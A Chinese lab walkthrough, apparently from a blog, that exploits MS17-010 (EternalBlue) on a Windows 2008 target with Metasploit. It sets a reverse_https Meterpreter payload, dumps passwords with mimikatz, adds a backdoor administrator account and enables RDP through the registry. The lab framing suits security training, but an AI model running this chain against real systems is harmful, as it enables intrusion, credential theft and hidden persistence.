任务环境说明:
服务器场景:Kali Linux(用户名:root;密码:toor)
服务器场景:Microsoft Windows2008 Server(用户名:administrator;密码:P@ssw0rd)
第一步,打开网络拓扑,点击启动选项,启动实验虚拟机
第二步,使用ifconfig和ipconfig命令分别获取渗透机和靶机的IP地址,使用ping命令进行网络连通性测试,确保网络可达
渗透机ip地址172.16.1.10
靶机ip地址172.16.1.4
第三步,使用命令msfconsole启动metasploit渗透测试平台
第四步,使用命令search搜索msf模块auxiliary/scanner/smb/smb_ms17_010验证目标靶机是否存在此漏洞
第五步,使用命令use auxiliary/scanner/smb/smb_ms17_010来调用漏洞扫描检测模块
show options查看需要配置的参数
使用命令set RHOSTS设置靶机地址,使用exploit或者run命令运行扫描模块
第六步,通过扫描发现目标靶机存在MS17-010漏洞,下一步使用use命令调用exploit/windwos /smb/ms17_010_eternalblue漏洞利用模块,然后使用show options命令查看配置参数,并对目标靶机地址进行设置
第七步,使用命令set PAYLOAD 设置一个攻击载荷模块,这里我们使用HTTPS协议的meterpreter反弹载荷windows/x64/meterpreter/reverse_https更不易察觉
第八步,使用命令show options查看载荷模块需要配置的参数
使用命令set RHOST 设置目标靶机地址
使用命令set LHOST设置本地反弹连接的地址
然后使用命令run或者exploit来运行该模块
第九步,使用命令sysinfo来查看目标靶机信息
第十步,使用命令Load mimikatz 来加载口令获取模块,然后使用命令wdigest来获取管理员密码
第十一步,使用命令shell启动meterpreter下cmd的shell终端,然后使用命令ipconfig查看当前网卡的信息,
输入命令whoami来查看当前的系统权限
第十二步,使用命令net user 账户名 密码 /add添加账户,然后进行提权
使用命令net localgroup administrators 后门用户 /add ,将后门用户提升为管理员权限
第十三步,使用命令 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 开启3389端口:
第十四步,使用命令rdesktop启动远程桌面连接终端,并使用后门用户进行登录
登录后门用户,成功渗透
2573
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
